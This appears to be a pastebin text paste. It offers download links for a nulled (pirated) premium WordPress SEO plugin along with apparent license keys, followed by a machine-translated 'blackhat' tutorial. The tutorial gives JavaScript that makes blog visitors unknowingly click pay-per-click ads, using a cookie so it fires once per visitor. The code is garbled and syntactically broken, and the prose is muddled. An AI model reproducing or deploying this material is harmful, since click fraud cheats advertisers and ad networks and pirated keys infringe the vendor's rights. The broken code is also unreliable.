
SUBMITTED BY: vionplace

DATE: Dec. 29, 2016, 12:19 p.m.

FORMAT: Text only

SIZE: 3.4 kB

HITS: 921

  1. Download All in One SEO Pack Pro v2.4.10.2
  2. Download Nulled All in One SEO Pack Pro v2.4.10.2
  3. Primary Key: 24Y2493470037207F
  4. Secondary Key: 8KS18354E2608161Y
  5. ttps://
  14. Actually, this script is a script that fraudulent ads on your blog will terklik by the visitor. The workings of the script auto click the ads is very simple. When visitors came, and the ads will target pal terklik automatically. Ads will appear in a new window, then make the cookies so that only once a terklik.
  15. The script will work if the entire blog terloading perfectly. If your blog has not terloading perfect, the script is not already running. Actually I do not recommend this trick. Because if you get caught then it is likely that a PPC pal account will be banned. Soo ... consider good - well before using this script. Risk your own hands.
  16. If indeed my friend are interested, please follow these guidelines:
  17. A. Copy the following script on your blog widget
  18. <script type="text/javascript">
  19. addEvent function (obj, EventName, func) {
  20. if (obj.attachEvent) {
  21. obj.attachEvent ("on" + EventName, func);
  22. } Else if (obj.addEventListener)
  23. {Obj.addEventListener (EventName, func, true);
  24. } Else
  25. {Obj ["on" + EventName] = func;
  26. }
  27. AddEvent} (window, "load", function (e) {
  28. addEvent (document.body, 'click', function (e)
  29. {If (document.cookie.indexOf ("SCT = shp") == -1)
  30. {
  31. var w = ('link target', 'height = 10, width = 10, top = 1900, left = 1900, scrollbars = yes')
  32. document.cookie = "SCT = shpsoftwarehouse";
  33. window.focus ();}});});
  34. </ Script>
  35. 2. In this paper I outline a thick black please mate change at will in accordance with the wishes of my friend. I am writing a thick line is for the purposes of cookies. So if it terklik, the ad will not be terklik again.
  36. 3. In writing my red solid line please fill in the link target ads on your blog. This link should periodically update buddy. Sebaba sometimes the target of ad impressions that my friend was gone. If the broadcast is over, auto clicks will not count.
  37. 4. Store and see the results.
  38. NOTE:
  39. Not all PPC can be given a script of this blackhat. Due to the PPC system is already advanced. So that the click is only counted when the ad comes from the script referer their PPC
  40. Remember ..!! This trick only for educational use only.
  41. Honest way better than cheating.

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